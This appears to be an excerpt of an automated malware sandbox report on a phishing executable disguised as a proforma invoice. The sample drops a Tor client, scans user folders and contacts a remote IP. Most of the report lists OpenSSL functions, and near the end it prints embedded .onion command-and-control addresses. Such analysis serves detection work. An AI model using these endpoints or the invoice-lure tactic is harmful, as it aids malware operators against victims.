            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44E40 DES_cbc_encrypt,DES_encrypt1,DES_encrypt1,86_2_6CE44E40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EE40 SEED_cbc_encrypt,86_2_6CE5EE40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE66E20 CRYPTO_ccm128_encrypt_ccm64,__stack_chk_fail,86_2_6CE66E20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26E30 ERR_load_CRYPTO_strings,ERR_func_error_string,86_2_6CE26E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22E30 CRYPTO_set_mem_debug_functions,OPENSSL_init,86_2_6CE22E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6EE20 OPENSSL_asc2uni,CRYPTO_malloc,strlen,__stack_chk_fail,86_2_6CF6EE20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED2E30 sk_deep_copy,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CED2E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEE0E30 EVP_EncryptUpdate,OpenSSLDie,__stack_chk_fail,OpenSSLDie,86_2_6CEE0E30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF04E10 d2i_PUBKEY,ASN1_item_d2i,CRYPTO_add_lock,ASN1_item_free,EVP_PKEY_free,86_2_6CF04E10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CECEE00 BIO_accept,accept,BIO_sock_should_retry,WSAGetLastError,ERR_put_error,ERR_put_error,__stack_chk_fail,BIO_set_tcp_ndelay,setsockopt,__stack_chk_fail,BIO_socket_nbio,ioctlsocket,WSAGetLastError,ERR_put_error,__stack_chk_fail,CRYPTO_malloc,__stack_chk_fail,BIO_clear_flags,__stack_chk_fail,ERR_put_error,86_2_6CECEE00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24E0C CRYPTO_lock,CRYPTO_lock,86_2_6CE24E0C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF44E00 X509_LOOKUP_file,__stack_chk_fail,X509_load_cert_file,__stack_chk_fail,__stack_chk_fail,X509_load_crl_file,__stack_chk_fail,X509_load_cert_crl_file,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_malloc,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,86_2_6CF44E00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CE10 AES_ctr128_encrypt,CRYPTO_ctr128_encrypt,86_2_6CE4CE10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6AFF0 PKCS12_unpack_p7encdata,OBJ_obj2nid,PKCS12_SAFEBAGS_it,PKCS12_item_decrypt_d2i,__stack_chk_fail,86_2_6CF6AFF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE62FF0 CRYPTO_gcm128_init,86_2_6CE62FF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EFC0 CRYPTO_cbc128_encrypt,__stack_chk_fail,86_2_6CE5EFC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22FD0 CRYPTO_get_locked_mem_functions,86_2_6CE22FD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF2EFC0 PEM_read_bio_PrivateKey,PEM_bytes_read_bio,d2i_X509_SIG,PKCS8_decrypt,ERR_put_error,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,EVP_PKEY_asn1_find_str,d2i_PrivateKey,d2i_PKCS8_PRIV_KEY_INFO,EVP_PKCS82PKEY,EVP_PKEY_free,PKCS8_PRIV_KEY_INFO_free,ERR_put_error,X509_SIG_free,PEM_def_callback,__stack_chk_fail,PEM_write_bio_PrivateKey,PEM_write_bio_PKCS8PrivateKey,BIO_snprintf,PEM_ASN1_write_bio,__stack_chk_fail,86_2_6CF2EFC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF36FB0 NETSCAPE_SPKI_b64_encode,i2d_NETSCAPE_SPKI,CRYPTO_malloc,CRYPTO_malloc,i2d_NETSCAPE_SPKI,EVP_EncodeBlock,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,86_2_6CF36FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEFAFA0 ASN1_GENERALIZEDTIME_set,OPENSSL_gmtime,CRYPTO_malloc,CRYPTO_free,BIO_snprintf,strlen,ERR_put_error,86_2_6CEFAFA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22F40 CRYPTO_get_mem_ex_functions,86_2_6CE22F40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AFB0 DES_xcbc_encrypt,DES_encrypt1,DES_encrypt1,86_2_6CE4AFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBEFB0 ENGINE_load_private_key,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CEBEFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED2FB0 sk_new_null,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,__stack_chk_fail,86_2_6CED2FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE58F80 CAST_ecb_encrypt,CAST_decrypt,__stack_chk_fail,CAST_encrypt,86_2_6CE58F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE84F80 ERR_put_error,CRYPTO_malloc,__stack_chk_fail,86_2_6CE84F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF4F80 EVP_PKEY_CTX_new_id,ENGINE_init,ENGINE_get_pkey_meth,CRYPTO_malloc,ENGINE_get_pkey_meth_engine,sk_find,OBJ_bsearch_,EVP_PKEY_free,EVP_PKEY_free,ENGINE_finish,CRYPTO_free,sk_value,ERR_put_error,ERR_put_error,ENGINE_finish,ERR_put_error,__stack_chk_fail,86_2_6CEF4F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEA4F90 RSAPublicKey_dup,ASN1_item_dup,__stack_chk_fail,RSAPrivateKey_dup,ASN1_item_dup,__stack_chk_fail,RSA_generate_key,RSA_new,BN_new,BN_free,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,i2d_RSAPublicKey,__stack_chk_fail,d2i_RSAPrivateKey,ERR_put_error,__stack_chk_fail,i2d_RSAPrivateKey,ERR_put_error,__stack_chk_fail,BN_cmp,BN_cmp,__stack_chk_fail,X509_PUBKEY_get0_param,d2i_RSAPublicKey,ERR_put_error,__stack_chk_fail,BN_num_bits,CRYPTO_malloc,BIO_indent,CRYPTO_free,BIO_printf,ERR_put_error,__stack_chk_fail,86_2_6CEA4F90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF24F70 i2d_ASN1_bytes,__stack_chk_fail,d2i_ASN1_bytes,ASN1_STRING_new,ASN1_get_object,ASN1_get_object,CRYPTO_free,ASN1_const_check_infinite_end,ASN1_STRING_new,CRYPTO_malloc,CRYPTO_free,__stack_chk_fail,86_2_6CF24F70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EF60 SEED_ofb128_encrypt,CRYPTO_ofb128_encrypt,86_2_6CE5EF60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF1CF60 X509_PKEY_new,CRYPTO_malloc,X509_ALGOR_new,ASN1_STRING_type_new,ERR_put_error,__stack_chk_fail,86_2_6CF1CF60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3AF60 X509_STORE_CTX_init,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,ERR_put_error,X509_policy_tree_free,sk_pop_free,CRYPTO_free_ex_data,CRYPTO_new_ex_data,ERR_put_error,X509_VERIFY_PARAM_free,__stack_chk_fail,X509_VERIFY_PARAM_lookup,X509_VERIFY_PARAM_inherit,86_2_6CF3AF60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AF70 DES_crypt,DES_fcrypt,86_2_6CE4AF70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22F40 CRYPTO_get_mem_ex_functions,86_2_6CE22F40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24F49 CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,lh_delete,CRYPTO_free,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,86_2_6CE24F49
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB0 CRYPTO_get_mem_functions,__stack_chk_fail,CRYPTO_get_mem_ex_functions,__stack_chk_fail,CRYPTO_get_locked_mem_functions,__stack_chk_fail,CRYPTO_get_locked_mem_ex_functions,__stack_chk_fail,CRYPTO_get_mem_debug_functions,86_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEE2F30 EVP_CIPHER_CTX_copy,ENGINE_init,OPENSSL_cleanse,CRYPTO_free,ENGINE_finish,CRYPTO_malloc,ERR_put_error,ERR_put_error,86_2_6CEE2F30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE24F00 CRYPTO_dbg_free,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,lh_delete,CRYPTO_free,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_THREADID_cmp,CRYPTO_lock,CRYPTO_free,CRYPTO_free,86_2_6CE24F00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE248E7 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_free,86_2_6CE248E7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4C8F0 _ossl_old_des_ofb64_encrypt,86_2_6CE4C8F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE268F9 CRYPTO_lock,86_2_6CE268F9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE248C9 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_free,86_2_6CE248C9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2A8D9 ASN1_OBJECT_free,CRYPTO_free,86_2_6CE2A8D9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4C880 _ossl_old_des_cfb64_encrypt,86_2_6CE4C880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEAA880 DSA_generate_parameters_ex,EVP_sha256,EVP_MD_size,EVP_sha1,__stack_chk_fail,EVP_MD_CTX_init,EVP_MD_size,CRYPTO_malloc,BN_CTX_new,BN_MONT_CTX_new,BN_CTX_start,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_CTX_get,BN_value_one,BN_sub,CRYPTO_free,CRYPTO_free,BN_CTX_end,BN_CTX_free,BN_MONT_CTX_free,EVP_MD_CTX_cleanup,BN_div,BN_MONT_CTX_set,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,BN_bin2bn,BN_mod_exp_mont,EVP_sha256,BN_CTX_get,BN_CTX_get,BN_value_one,BN_lshift,BN_GENCB_call,EVP_Digest,BN_bin2bn,BN_is_prime_fasttest_ex,BN_GENCB_call,BN_GENCB_call,BN_set_word,EVP_Digest,BN_bin2bn,BN_lshift,BN_add,BN_mask_bits,BN_copy,BN_add,BN_lshift1,BN_div,BN_value_one,BN_sub,BN_sub,BN_cmp,BN_is_prime_fasttest_ex,BN_GENCB_call,CRYPTO_malloc,EVP_sha224,EVP_sha1,BN_set_word,BN_value_one,BN_add,RAND_bytes,BN_GENCB_call,BN_free,BN_dup,BN_free,BN_dup,BN_free,BN_dup,ERR_put_error,ERR_put_error,__stack_chk_fail,BN_GENCB_call,86_2_6CEAA880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2288C CRYPTO_get_dynlock_value,__stack_chk_fail,OpenSSLDie,86_2_6CE2288C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF4C880 X509V3_add_value_uchar,BUF_strdup,BUF_strdup,CRYPTO_malloc,sk_push,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,sk_new_null,__stack_chk_fail,X509V3_add_value_bool,BUF_strdup,BUF_strdup,CRYPTO_malloc,sk_push,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,sk_new_null,__stack_chk_fail,X509V3_add_value_bool_nf,86_2_6CF4C880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE60890 CRYPTO_cts128_encrypt_block,CRYPTO_cbc128_encrypt,86_2_6CE60890
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF78880 UI_get_input_flags,__stack_chk_fail,UI_get0_output_string,__stack_chk_fail,UI_get0_action_string,__stack_chk_fail,UI_get0_result_string,__stack_chk_fail,UI_get0_test_string,__stack_chk_fail,UI_get_result_minsize,__stack_chk_fail,UI_get_result_maxsize,__stack_chk_fail,UI_set_result,strlen,__stack_chk_fail,__stack_chk_fail,_iob,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,fopen,fopen,_iob,_iob,__stack_chk_fail,UI_get_string_type,__stack_chk_fail,signal,86_2_6CF78880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC4890 BIO_vfree,CRYPTO_add_lock,CRYPTO_free_ex_data,__stack_chk_fail,86_2_6CEC4890
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2689C CRYPTO_lock,CRYPTO_lock,86_2_6CE2689C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26870 CRYPTO_cleanup_all_ex_data,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CE26870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE80870 BN_GF2m_mod_solve_quad,BN_num_bits,CRYPTO_malloc,ERR_put_error,CRYPTO_free,BN_GF2m_mod_solve_quad_arr,86_2_6CE80870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6C850 PKCS12_pbe_crypt,EVP_CIPHER_CTX_init,EVP_PBE_CipherInit,EVP_CIPHER_CTX_block_size,CRYPTO_malloc,EVP_CipherUpdate,EVP_CipherFinal_ex,EVP_CIPHER_CTX_cleanup,86_2_6CF6C850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF72850 OCSP_sendreq_new,CRYPTO_malloc,BIO_s_mem,BIO_new,CRYPTO_malloc,BIO_printf,OCSP_REQUEST_it,ASN1_item_i2d,BIO_printf,ASN1_item_i2d_bio,BIO_free,CRYPTO_free,CRYPTO_free,BIO_free,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CF72850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE26849 CRYPTO_lock,86_2_6CE26849
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE68850 CRYPTO_128_unwrap,memmove,memcmp,OPENSSL_cleanse,__stack_chk_fail,86_2_6CE68850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF64840 PKCS7_add_certificate,OBJ_obj2nid,CRYPTO_add_lock,sk_push,ERR_put_error,X509_free,ERR_put_error,sk_new_null,__stack_chk_fail,86_2_6CF64840
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEEA850 EVP_rc2_64_cbc,__stack_chk_fail,EVP_rc2_40_cbc,__stack_chk_fail,__stack_chk_fail,EVP_CIPHER_CTX_key_length,CAST_set_key,__stack_chk_fail,CAST_cfb64_encrypt,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,EVP_cast5_cbc,__stack_chk_fail,EVP_cast5_cfb64,__stack_chk_fail,EVP_cast5_ofb,__stack_chk_fail,EVP_cast5_ecb,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,EVP_md_null,__stack_chk_fail,86_2_6CEEA850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6E830 PKCS12_set_mac,PKCS12_MAC_DATA_new,ASN1_STRING_type_new,ASN1_INTEGER_set,CRYPTO_malloc,EVP_MD_type,OBJ_nid2obj,ASN1_TYPE_new,OBJ_obj2nid,ASN1_STRING_set,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,RAND_bytes,EVP_sha1,__stack_chk_fail,PKCS12_setup_mac,PKCS12_MAC_DATA_new,ASN1_STRING_type_new,ASN1_INTEGER_set,CRYPTO_malloc,EVP_MD_type,OBJ_nid2obj,ASN1_TYPE_new,ERR_put_error,RAND_bytes,ERR_put_error,__stack_chk_fail,86_2_6CF6E830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22830 CRYPTO_lock,__stack_chk_fail,OpenSSLDie,86_2_6CE22830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE50830 AES_cbc_encrypt,86_2_6CE50830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE72830 BN_mod_lshift_quick,BN_copy,BN_num_bits,BN_num_bits,BN_lshift1,BN_cmp,BN_sub,BN_lshift,ERR_put_error,__stack_chk_fail,BN_mod_lshift,BN_div,__stack_chk_fail,BN_bn2hex,CRYPTO_strdup,__stack_chk_fail,86_2_6CE72830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEEC830 EVP_PKEY_new,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CEEC830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE54800 RC2_decrypt,__stack_chk_fail,RC2_cbc_encrypt,RC2_decrypt,86_2_6CE54800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE66800 CRYPTO_ccm128_decrypt,86_2_6CE66800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6E800 bn_dup_expand,CRYPTO_malloc,ERR_put_error,CRYPTO_free,86_2_6CE6E800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF32800 b2i_PublicKey_bio,BIO_read,ERR_put_error,CRYPTO_malloc,BIO_read,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CF32800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF489F0 X509V3_EXT_i2d,X509V3_EXT_get_nid,ASN1_item_i2d,ASN1_STRING_type_new,X509_EXTENSION_create_by_NID,ASN1_STRING_free,CRYPTO_malloc,ERR_put_error,ERR_put_error,__stack_chk_fail,X509V3_EXT_add_nconf_sk,NCONF_get_section,__stack_chk_fail,X509V3_EXT_add_nconf,NCONF_get_section,sk_value,X509V3_EXT_nconf,sk_num,__stack_chk_fail,X509V3_EXT_CRL_add_nconf,NCONF_get_section,sk_value,X509V3_EXT_nconf,sk_num,__stack_chk_fail,X509V3_EXT_REQ_add_nconf,NCONF_get_section,__stack_chk_fail,X509V3_get_string,ERR_put_error,__stack_chk_fail,86_2_6CF489F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEB89E0 ECDH_get_ex_new_index,CRYPTO_get_ex_new_index,86_2_6CEB89E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF369C0 X509_REQ_add_extensions,ASN1_TYPE_new,ASN1_STRING_new,X509_EXTENSIONS_it,ASN1_item_i2d,X509_ATTRIBUTE_new,sk_new_null,sk_push,X509_ATTRIBUTE_free,ASN1_TYPE_free,OBJ_nid2obj,sk_push,sk_new_null,__stack_chk_fail,X509_REQ_get_attr_count,__stack_chk_fail,X509_REQ_get_attr_by_NID,__stack_chk_fail,X509_REQ_get_attr_by_OBJ,__stack_chk_fail,X509_REQ_get_attr,__stack_chk_fail,X509_REQ_delete_attr,__stack_chk_fail,X509_REQ_add1_attr,X509at_add1_attr,__stack_chk_fail,X509_REQ_add1_attr_by_OBJ,X509at_add1_attr_by_OBJ,__stack_chk_fail,X509_REQ_add1_attr_by_NID,X509at_add1_attr_by_NID,__stack_chk_fail,X509_REQ_add1_attr_by_txt,X509at_add1_attr_by_txt,__stack_chk_fail,NETSCAPE_SPKI_set_pubkey,__stack_chk_fail,NETSCAPE_SPKI_get_pubkey,__stack_chk_fail,NETSCAPE_SPKI_b64_decode,CRYPTO_malloc,strlen,ERR_put_error,__stack_chk_fail,NETSCAPE_SPKI_b64_encode,i2d_NETSCAPE_SPKI,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,__stack_chk_fail,X509_CRL_get_ext_by_NID,X509_CRL_get_ext_by_NID,86_2_6CF369C0
            Source: taskhsvc.exe, 00000056.00000003.2524836000.00000000036CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_e4063b3d-e
            Source: unknownHTTPS traffic detected: 77.73.69.128:443 -> 192.168.2.16:49732 version: TLS 1.2
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,10_2_10002300
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,10_2_10004A40
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDAA18.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDAA17.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\~SDAA16.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\~SD34E5.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SDAA19.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SDAA1A.tmpJump to behavior
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CD65A00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CD61B90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDCADD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CE44DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CE44DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 2Ch86_2_6CECCD10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CE58F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CEF2F60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CEB28F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CE72830
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push esi86_2_6CEFC9A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CE72960
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push edi86_2_6CE4AA80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push ebp86_2_6CE9EA60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then push esi86_2_6CEFCBA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 4x nop then sub esp, 1Ch86_2_6CED2B90

            Networking

            barindex
            Found Tor onion address
            Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
